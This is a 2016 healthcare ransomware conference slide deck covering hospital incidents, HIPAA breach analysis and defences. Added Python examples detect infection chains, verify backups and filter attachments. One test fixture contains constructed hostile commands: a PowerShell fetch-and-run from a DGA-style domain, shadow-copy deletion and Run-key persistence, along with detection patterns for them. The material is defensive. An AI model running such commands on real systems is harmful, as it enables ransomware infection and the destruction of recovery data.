The Rise of Ransomware PowerPoint Presentation, PPT - DocSlides


Uploaded to DocSlides: 2017-04-20


Slide1

The Rise of Ransomware in Healthcare: New Threats, Old Solutions

Chuck Kesler – CISO, Duke Health
Jon Sternstein – Stern Security

22nd NCHICA Annual Conference

August 2016

Slide2

Introductions

Chuck Kesler
Chief Information Security Officer, Duke Health
Prior to Duke, led Symantec’s Security Advisory Services team in the US
NCHICA Board Member
30 years of IT technical and management experience

Slide3

Introductions

Jon Sternstein
Founder & Principal Consultant at Stern Security
Former Healthcare Security Officer
Co-chair of NCHICA Security Workgroup
SANS Institute – Mentor, SANS 560: Network Penetration Testing and Ethical Hacking

Slide4

Agenda

Overview of the ransomware threat in healthcare
Anatomy of an attack
Applying old solutions to this new problem
Is it a breach?

Slide5

What is ransomware?

Malware that extorts a user or organization by encrypting files until a ransom is paid
Variants have been observed for several years, but are becoming increasingly sophisticated
The ransoms demanded may range from a few hundred to thousands of dollars, and often must be paid in Bitcoin
Access is usually restored after the ransom is paid

Slide6

Ransomware Isn’t New

In 2012, a Symantec report estimated that a single ransomware command & control server could yield $33,600 per day in ransoms
In 2014, the Town of Greenland, New Hampshire had a ransomware attack that resulted in the loss of 8 years’ worth of electronic records
In 2015, the FBI received more than 2,400 ransomware complaints, which totaled $25M in damages
Individuals are also being targeted

Slide7

How do these infections occur?

Phishing (link clicks and attachments)
Drive-by downloads (e.g. from malicious advertisements)
Web server vulnerabilities
Common denominators: missing patches, poor access controls


Slide8

Why is ransomware so effective?

Organizations that aren’t prepared to respond are intimidated into taking quick and possibly rash action
Inability to contain a spreading attack forces systems to be taken offline
Lack of good backups and contingency plans forces organizations to consider paying ransoms
Sometimes, even the backups have been compromised


Slide9

Healthcare in the crosshairs

Hollywood Presbyterian
MedStar
Kentucky Methodist Hospital
Chino Valley Medical Center
Desert Valley Hospital
Alvarado Hospital Medical Center
King’s Daughters’ Health

Healthcare IT News survey of hospitals: “How many ransomware attacks have targeted your organization in the last 12 months?” 75% have had at least one.

Slide10

Evolving Ransomware Threats

Spreading via server vulnerabilities (MedStar)
Attackers using 0-day vulnerabilities
Potential for a coordinated, time-delayed attack
Potential for data breach

Slide11

So, is it a breach?

Slide12

Is It a Breach?

HHS recently released guidance that provides guidelines for ransomware breach analysis and reporting:
http://www.hhs.gov/sites/default/files/RansomwareFactSheet.pdf

“Part of a deeper analysis should involve assessing whether or not there was a breach of PHI as a result of the security incident. The presence of ransomware (or any malware) is a security incident under HIPAA that may also result in an impermissible disclosure of PHI in violation of the Privacy Rule and a breach, depending on the facts and circumstances of the attack.”

Slide13

Is It a Breach?

“When electronic protected health information (ePHI) is encrypted as the result of a ransomware attack, a breach has occurred because the ePHI encrypted by the ransomware was acquired (i.e., unauthorized individuals have taken possession or control of the information), and thus is a “disclosure” not permitted under the HIPAA Privacy Rule.

Unless the covered entity or business associate can demonstrate that there is a “...low probability that the PHI has been compromised,” based on the factors set forth in the Breach Notification Rule, a breach of PHI is presumed to have occurred. The entity must then comply with the applicable breach notification provisions…”

Slide14

Is It a Breach?

Some considerations for a ransomware breach analysis:
What ransomware variant was involved?
Does that variant have a history of data exfiltration?
If a new variant, work with security researchers to determine its behavior
Look at network logs and file access audit trails to determine if there is evidence of data exfiltration
Also consider the impact to data integrity and availability
Thoroughly document your findings

Slide15

Anatomy of an Attack

Slide16

Ransomware in healthcare

Methodist Hospital (Kentucky)
Declared state of emergency
Shut down all workstations
Attackers demanded $1,600 (4 bitcoins)
Back to paper for 5 days

Slide17

Ransomware in healthcare

Hollywood Presbyterian Medical Center
Paid $17,000 (40 bitcoins) to regain access
Systems were down for 10 days
Back to paper records
Some patients redirected to other hospitals

Slide18

Technical Analysis

Technical overview:
Delivery
Execution
Encryption
Payment
Decryption

Slide19

Malicious Document

Infection
Enabling macros = infection
Runs in memory
Grabs complete malware from the Internet
Deletes traces of itself

Slide20

Malicious Communication

Communication
Connects to command & control using a Domain Generation Algorithm (DGA)
Example: on August 29th, 2016, use YYISIEJAOOO.COM
Gets encryption keys
Determines cost
Gets ransom note

Slide21

Malicious activity

Execution
Deletes Volume Shadow Copies
Adds itself to startup
Encrypts files
Encrypts network shares
Delivers ransom note
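The chain on slides 19 through 21 (macro-enabled document, in-memory downloader, DGA-based command & control, shadow copy deletion, startup persistence) leaves traces in ordinary host telemetry. The following is an added example, not part of the original deck: a small Python triage run over constructed Sysmon-style process-creation and DNS-query records. The hostnames, paths, command lines and the domain xk3q8zt1pvn9w.net are made up (yyisiejaooo.com is the slide's own DGA example); the Run-key rule is one common startup technique, an assumption since the deck does not say which persistence method the analysed sample used; the DGA thresholds are starting points to tune against your own DNS baseline, not validated values.

```python
"""Triage of the slide 19-21 infection chain over host telemetry.

Added example, not from the original deck. Process-creation and DNS records
are constructed to resemble Sysmon events; hostnames, paths and
xk3q8zt1pvn9w.net are made up, yyisiejaooo.com is the slide's own example.
"""
import math
import ntpath
import re
from collections import Counter

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe",
                "mshta.exe", "rundll32.exe", "regsvr32.exe"}
# Common commands for destroying local recovery points (slide 21).
SHADOW_COPY_PATTERNS = [
    re.compile(r"vssadmin(\.exe)?\s+delete\s+shadows", re.I),
    re.compile(r"wmic(\.exe)?\s+shadowcopy\s+delete", re.I),
    re.compile(r"wbadmin(\.exe)?\s+delete\s+catalog", re.I),
]
# One common "adds itself to startup" method. Assumption: the deck does not
# say which persistence mechanism the analysed sample used.
RUN_KEY = re.compile(
    r'reg(\.exe)?\s+add\s+"?HK(LM|CU)\\Software\\Microsoft\\Windows\\CurrentVersion\\Run',
    re.I)


def classify_process(parent_image, image, command_line):
    """Tags for one process-creation event; an empty list means nothing seen."""
    parent = ntpath.basename(parent_image).lower()
    child = ntpath.basename(image).lower()
    tags = []
    if parent in OFFICE_APPS and child in SCRIPT_HOSTS:
        tags.append("office-spawned-script-host")  # macro dropper, slide 19
    if any(p.search(command_line) for p in SHADOW_COPY_PATTERNS):
        tags.append("shadow-copy-deletion")
    if RUN_KEY.search(command_line):
        tags.append("run-key-persistence")
    return tags


def is_dga_like(domain, min_len=8, max_entropy=3.8, vowel_band=(0.2, 0.6),
                max_consonant_run=5):
    """Heuristic check on the registered label (the part left of the TLD).

    Thresholds are assumptions to tune against a DNS baseline; in production
    pair this with an allow-list and reputation feeds.
    """
    parts = domain.lower().rstrip(".").split(".")
    label = parts[-2] if len(parts) >= 2 else parts[0]
    if len(label) < min_len:
        return False
    n = len(label)
    entropy = -sum(c / n * math.log2(c / n) for c in Counter(label).values())
    letters = [ch for ch in label if ch.isalpha()]
    vowel_ratio = (sum(ch in "aeiou" for ch in letters) / len(letters)) if letters else 0.0
    longest_run = max((len(m) for m in re.findall(r"[b-df-hj-np-tv-z]+", label)), default=0)
    return (entropy >= max_entropy
            or not (vowel_band[0] <= vowel_ratio <= vowel_band[1])
            or longest_run >= max_consonant_run)


def triage(process_events, dns_events):
    """Run both detectors over the telemetry and collect findings."""
    process_alerts = [(tag, ntpath.basename(image).lower())
                      for parent, image, cmd in process_events
                      for tag in classify_process(parent, image, cmd)]
    dga_domains = [name for _, name in dns_events if is_dga_like(name)]
    return {"process_alerts": process_alerts, "dga_domains": dga_domains}


# Constructed telemetry: (parent image, image, command line).
PROCESS_EVENTS = [
    (r"C:\Windows\explorer.exe",
     r"C:\Program Files\Microsoft Office\Office16\WINWORD.EXE",
     r'"WINWORD.EXE" /n "C:\Users\rn01\Downloads\Invoice_8832.docm"'),
    (r"C:\Program Files\Microsoft Office\Office16\WINWORD.EXE",
     r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "powershell.exe -nop -w hidden -c \"IEX (New-Object Net.WebClient)"
     ".DownloadString('http://yyisiejaooo.com/s2')\""),
    (r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     r"C:\Windows\System32\reg.exe",
     r'reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" '
     r'/v Updater /t REG_SZ /d "C:\Users\rn01\AppData\Roaming\svchost.exe"'),
    (r"C:\Users\rn01\AppData\Roaming\svchost.exe",
     r"C:\Windows\System32\vssadmin.exe",
     "vssadmin.exe Delete Shadows /All /Quiet"),
    (r"C:\Windows\System32\services.exe",
     r"C:\Windows\System32\svchost.exe",
     "svchost.exe -k netsvcs"),  # benign, should stay quiet
]
# Constructed DNS queries: (host, queried name).
DNS_EVENTS = [
    ("WS-ER-07", "windowsupdate.microsoft.com"),
    ("WS-ER-07", "portal.examplehospital.org"),
    ("WS-ER-07", "yyisiejaooo.com"),
    ("WS-ER-07", "xk3q8zt1pvn9w.net"),
]

if __name__ == "__main__":
    for key, findings in triage(PROCESS_EVENTS, DNS_EVENTS).items():
        print(key, findings)
```

The process rules fire on the parent/child relationship and command line, not on file hashes, so they survive the "grabs complete malware from the Internet" step where the payload changes every campaign. The DGA check is deliberately simple; the point is that a name like YYISIEJAOOO.COM has a vowel distribution and randomness no human-chosen hospital or vendor domain has, which is exactly the signal an IDS rule or a DNS log pipeline can compute on the way to blocking the command & control channel.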

Slide22

To Pay or not to Pay

Bitcoins
Payment is pseudonymous and hard to trace
Buy Bitcoin @ Coinbase
Receive decryption software
Must purchase for each infected machine
Will you get your files back?

Slide23

Ransomware in healthcare

Kansas Heart Hospital
May 2016
Paid ransom, but didn’t get decryption keys
Malware authors demanded a second payment
Hospital refused to pay the second ransom

Slide24

Ransomware breaches

Encrypts and steals data
Chimera ransomware – 2015
Crysis ransomware – 2016
Reportable breach

Slide25

Ransomware spreads

It’s not just Windows anymore!
Official “Transmission” BitTorrent client for Macs was infected (KeRanger, March 2016)
Signed with a valid Apple developer certificate
Apple revoked the certificate

Slide26

Ransomware Malvertising

March 2016
Affected sites: MSN, BBC.com, the New York Times, AOL, Newsweek and more
Malicious advertisements
Criminals acquired ad domains after they expired

Slide27

Old Solutions for New Problems

Slide28

Solutions

Implement security best practices
Nothing new here – the same practices apply to ransomware
Basic concepts: protect, detect, respond, and recover
SANS 20 Critical Security Controls: https://www.sans.org/critical-security-controls

Slide29

Protect

Application whitelisting
Only allow known good applications to run; this stops most ransomware payloads before they execute
Does not by itself cover code running inside an already-allowed application (e.g. Office macros, PowerShell scripts), so pair it with macro and script controls
Caveat: you have to know what apps you want to allow, which can be difficult in a dynamic environment

Slide30

Protect

Patching – operating systems, Office, Adobe, browsers, etc.
Remove unnecessary software
Web filtering
Block suspicious attachments
Block/whitelist Office macros
Network share access controls – minimize write permissions!
Much more…

Slide31

Protect

Backup important files
Must test data recovery
HIPAA requirement:
Data backup plan (R = required) § 164.308(a)(7)(ii)(A)
Data backup and storage (A = addressable) § 164.310(d)(2)(iv)
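“Must test data recovery” is the step most often skipped, and slide 8 notes that sometimes the backups themselves have been compromised. The following is an added example, not from the deck: a Python restore test that records a SHA-256 manifest when the backup is taken, then checks a restored tree for missing, added and altered files and flags altered files whose contents look like ciphertext, which is what a backup set looks like once ransomware has reached it. The file names, directory layout and the 7.5 bits/byte entropy threshold are constructed for the demo and are not from the presentation.

```python
"""Restore test against a manifest (slide 31: "Must test data recovery").

Added example, not from the original deck. run_demo() builds a constructed
file share in a temp directory, records a manifest, then damages the copy
the way ransomware would before verifying the "restore".
"""
import hashlib
import math
import os
import random
import shutil
import tempfile
from collections import Counter

ENTROPY_THRESHOLD = 7.5  # bits/byte; assumption: documents sit well below, ciphertext near 8


def sha256_of(path):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def byte_entropy(path, sample=65536):
    """Shannon entropy of the first `sample` bytes; ~8.0 for encrypted data."""
    with open(path, "rb") as f:
        data = f.read(sample)
    if not data:
        return 0.0
    return -sum(n / len(data) * math.log2(n / len(data)) for n in Counter(data).values())


def build_manifest(root):
    """Relative path -> SHA-256, captured when the backup is taken and stored apart from it."""
    manifest = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            manifest[os.path.relpath(full, root).replace(os.sep, "/")] = sha256_of(full)
    return manifest


def verify_restore(restored_root, manifest):
    """Compare a restored tree with the manifest; flag new/changed files that look encrypted."""
    current = build_manifest(restored_root)
    missing = sorted(set(manifest) - set(current))
    extra = sorted(set(current) - set(manifest))
    changed = sorted(p for p in manifest.keys() & current.keys() if manifest[p] != current[p])
    suspicious = sorted(p for p in changed + extra
                        if byte_entropy(os.path.join(restored_root, p)) >= ENTROPY_THRESHOLD)
    return {"missing": missing, "extra": extra, "changed": changed, "suspicious": suspicious}


def run_demo():
    """Constructed scenario: back up three files, then damage the copy before the restore check."""
    rng = random.Random(2016)
    work = tempfile.mkdtemp(prefix="restore-test-")
    try:
        src = os.path.join(work, "fileshare")
        os.makedirs(os.path.join(src, "records"))
        files = {  # constructed sample content, not real records
            "records/patient_list.docx": b"constructed sample document text " * 200,
            "records/schedule.txt": b"08:00 clinic A\n09:30 clinic B\n" * 100,
            "readme.txt": b"constructed readme\n",
        }
        for rel, data in files.items():
            with open(os.path.join(src, rel), "wb") as f:
                f.write(data)
        manifest = build_manifest(src)

        restored = os.path.join(work, "restored")
        shutil.copytree(src, restored)
        # Simulate ransomware having reached the backup set: one file overwritten
        # with ciphertext-like bytes, one renamed with a new extension, one deleted.
        with open(os.path.join(restored, "records/patient_list.docx"), "wb") as f:
            f.write(bytes(rng.getrandbits(8) for _ in range(4096)))
        os.rename(os.path.join(restored, "records/schedule.txt"),
                  os.path.join(restored, "records/schedule.txt.locked"))
        os.remove(os.path.join(restored, "readme.txt"))
        return verify_restore(restored, manifest)
    finally:
        shutil.rmtree(work, ignore_errors=True)


if __name__ == "__main__":
    for key, paths in run_demo().items():
        print(f"{key}: {paths}")
```

Keep the manifest somewhere the backup job cannot overwrite; a manifest that lives next to the backup is encrypted along with it. A rename shows up as one missing plus one extra entry, which is how mass “.locked”-style renames look in the report, while an in-place overwrite shows up as changed and, if the bytes are ciphertext, suspicious.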

Slide32

Detect & Respond

Intrusion detection & prevention
Identify potential “command & control” communications
Automatically drop traffic to known bad actors
Need 24x7x365 coverage for monitoring and response, which can be a huge challenge for smaller organizations

Slide33

Detect & Respond

Awareness – don’t forget about Layer 8!
Make sure users and IT personnel can recognize the signs of a ransomware attack and know what to do if one occurs
Successfully containing a ransomware attack hinges on quick recognition and reporting of the issue

Slide34

Respond & Recover

Be prepared!
Assume the worst may happen
Have cybersecurity insurance in place
Identify those who need to be involved in managing a significant incident
Practice with tabletop exercises
Decide and document how decisions will be made about paying ransoms
Have a Bitcoin account ready
Know your local FBI and law enforcement contacts
Report ransomware attacks to the FBI via www.ic3.gov

Slide35

Respond & Recover

Basic steps for incident response still apply for ransomware:
Contain the spread of the ransomware
Eradicate the ransomware from affected systems
Restore affected systems and data to return to normal operations
Perform a post-incident review, including breach analysis
Document lessons learned and implement improvements

Slide36

Help! We have Ransomware… Now What?!

Slide37

Ransomware Help

Home solutions
PC: CryptoPrevent software
Mac: application whitelisting with Google’s Santa project; firewall with Little Snitch

Slide38

Ransomware Help

NoMoreRansom.org
Ransomware Master List – lists ways to decrypt files (if available): https://goo.gl/VnAjsn

Slide39

Q&A

Slide40

References and Backup Slides

Slide41

References

Methodist Hospital Declares State of Emergency: http://krebsonsecurity.com/2016/03/hospital-declares-internet-state-of-emergency-after-ransomware-infection/
Hollywood Presbyterian Medical Center pays ransom:
http://www.computerworld.com/article/3034736/security/hospital-pays-17k-ransom-to-get-back-access-to-encrypted-files.html
http://www.theregister.co.uk/2016/02/18/la_hospital_bitcoins/
http://arstechnica.com/security/2016/02/hospital-pays-17k-for-ransomware-crypto-key/
Kansas Heart Hospital asked to pay two ransoms: http://www.networkworld.com/article/3073495/security/kansas-heart-hospital-hit-with-ransomware-paid-but-attackers-demanded-2nd-ransom.html
Malicious advertisements on major news sites: http://www.bbc.com/news/technology-35821276
Evolution of ransomware: http://arstechnica.com/security/2016/04/ok-panic-newly-evolved-ransomware-is-bad-news-for-everyone
Brian Krebs – Krebs on Security blog: http://krebsonsecurity.com/tag/ransomware/
Google’s Santa project: https://github.com/google/santa

Slide42

References

Ransomware that encrypts and steals data – Crysis: https://www.eset.com/us/resources/detail/new-ransomware-threat-crysis-lays-claim-to-teslacrypt-s-former-turf/
Ransomware Master List: https://docs.google.com/spreadsheets/d/1TWS238xacAto-fLKh1n5uTsdijWdCEsGIM0Y0Hvmc5g/pubhtml#
Ransomware prevention tips: https://sternsecurity.com/blog/ransomware-prevention-tips
The Complete Ransomware Guide: https://blog.varonis.com/the-complete-ransomware-guide
US-CERT advisory: https://www.us-cert.gov/ncas/alerts/TA16-091A
SamSam: http://blog.talosintel.com/2016/03/samsam-ransomware.html
Ransomware exploiting JBoss vulnerabilities: http://www.deependresearch.org/2016/04/jboss-exploits-view-from-victim.html
Locky: https://nakedsecurity.sophos.com/2016/02/17/locky-ransomware-what-you-need-to-know/
CryptoPrevent: https://www.foolishit.com/cryptoprevent-malware-prevention/

Slide43

Protect

Endpoint protection
Starts with traditional signature-based anti-virus, but goes much further
Also validates files with behavioral and reputational techniques
Host-based firewalling and intrusion detection/prevention
Many endpoint protection features may not be enabled by default – enable them!
Won’t prevent every attack, but can help contain and eradicate a ransomware attack

Slide44

Protect

Patching
Critical operating system patches (yes, Mac & Linux too!)
Web servers
Web browsers
Office applications
Flash, Silverlight, QuickTime, and other similar browser plugins
Extra credit: remove Flash, Silverlight, etc. if not needed, or consider using plugins that selectively block ads and Flash content

Slide45

Protect

Email filtering
Spam control
URL re-writing
Virus scanning
Block suspicious attachments: .exe, .jar, .scr, .bat, .aru, .cmd, .vbs, .7z, .ex, .ex_, .ex1, .pif, .application, .gadget, .com, .hta, .cpl, .msc, .vb, .vbe, .js, .jse, .ws, .wsf, .wsc, .wsh, .ps1, .ps1xml, .ps2, .ps2xml, .psc1, .psc2, .scf, .lnk, .inf, .reg, .docm, .dotm, .xlsm, .xltm, .xlam, .pptm, .potm, .ppam, .ppsm, .sldm, .msi, .msp, .mst
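The attachment list above is only as good as the filename check behind it. The following is an added example, not from the deck: a Python policy check that uses the slide's own extension list, plus the normalisation a plain endswith() test misses (mixed case, double extensions such as Invoice.pdf.exe, whitespace padding, trailing dots, and the Unicode right-to-left-override display trick), run over a constructed MIME message built with the standard library. The addresses, filenames and attachment bytes are made up; the decision to block on any inner extension as well as the outer one is a policy choice made here, not something the slide states.

```python
"""Attachment blocking (slide 45) as a filename policy check.

Added example, not from the original deck. BLOCKED_EXTENSIONS is the slide's
own list; the normalisation rules and the sample message are constructed.
"""
import unicodedata
from email.message import EmailMessage

BLOCKED_EXTENSIONS = {
    ".exe", ".jar", ".scr", ".bat", ".aru", ".cmd", ".vbs", ".7z", ".ex", ".ex_", ".ex1",
    ".pif", ".application", ".gadget", ".com", ".hta", ".cpl", ".msc", ".vb", ".vbe",
    ".js", ".jse", ".ws", ".wsf", ".wsc", ".wsh", ".ps1", ".ps1xml", ".ps2", ".ps2xml",
    ".psc1", ".psc2", ".scf", ".lnk", ".inf", ".reg", ".docm", ".dotm", ".xlsm", ".xltm",
    ".xlam", ".pptm", ".potm", ".ppam", ".ppsm", ".sldm", ".msi", ".msp", ".mst",
}


def normalize_filename(name):
    """Drop Unicode format controls (the RLO display trick), the trailing
    dots and spaces Windows ignores, and case differences."""
    name = "".join(ch for ch in name if unicodedata.category(ch) != "Cf")
    return name.strip().rstrip(". ").lower()


def extensions_of(name):
    """Every extension, outermost first: 'a.pdf.exe' -> ['.exe', '.pdf'].
    Whitespace around each part is stripped so 'a.pdf   .exe' is seen."""
    parts = [p.strip() for p in name.split(".")]
    return ["." + p for p in reversed(parts[1:]) if p]


def check_attachment(filename):
    """Return (blocked, reason) for one attachment filename."""
    exts = extensions_of(normalize_filename(filename))
    if not exts:
        return False, "no extension"
    if exts[0] in BLOCKED_EXTENSIONS:
        return True, f"blocked extension {exts[0]}"
    hidden = [e for e in exts[1:] if e in BLOCKED_EXTENSIONS]
    if hidden:  # policy choice: a blocked type hidden behind a harmless one is still blocked
        return True, f"blocked inner extension {hidden[0]}"
    return False, "allowed"


def scan_message(msg):
    """[(filename, blocked, reason), ...] for every attachment part in a message."""
    results = []
    for part in msg.iter_attachments():
        name = part.get_filename()
        if not name:  # nameless attachments go to manual review rather than through
            results.append(("", True, "attachment without filename"))
            continue
        blocked, reason = check_attachment(name)
        results.append((name, blocked, reason))
    return results


def build_sample_message():
    """Constructed message: one benign attachment and two that the policy should stop."""
    msg = EmailMessage()
    msg["From"] = "billing@example.net"
    msg["To"] = "ap@examplehospital.org"
    msg["Subject"] = "Invoice 8832"
    msg.set_content("Please see the attached invoice.")
    msg.add_attachment(b"%PDF-1.4 constructed", maintype="application", subtype="pdf",
                       filename="Invoice_8832.pdf")
    msg.add_attachment(b"MZ constructed", maintype="application", subtype="octet-stream",
                       filename="Invoice_8832.pdf.exe")
    msg.add_attachment(b"PK constructed", maintype="application",
                       subtype="vnd.ms-word.document.macroEnabled.12",
                       filename="Invoice_8832.docm")
    return msg


if __name__ == "__main__":
    for name, blocked, reason in scan_message(build_sample_message()):
        print(f"{'BLOCK' if blocked else 'allow':5} {name!r}: {reason}")
```

A gateway that looks only at the declared Content-Type or at the last four characters lets Invoice.pdf.exe, invoice.pdf   .exe and the RLO-renamed invoice‮fdp.exe through, even though each one runs as an executable on the desktop. Archive types on the list (.7z) are blocked outright here; if you must allow archives, apply the same check to the names inside them.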

Slide46

Protect

Limit permissions on network shares
Ensure that only those who need access to shares have access
Write permissions should be strictly limited
Discontinue the use of any world-writeable shares!
Keep in mind that ransomware can affect cloud-based file sharing services too

Slide47

Protect

Network segmentation
Avoid flat internal networks
Create zones where systems with similar security profiles are grouped
Require traffic between zones to flow through firewalls
Monitor for malicious traffic between zones
Implement using Virtual Routing and Forwarding (VRF) technology
Caveat: requires sophisticated network engineering and knowledge of application data flows

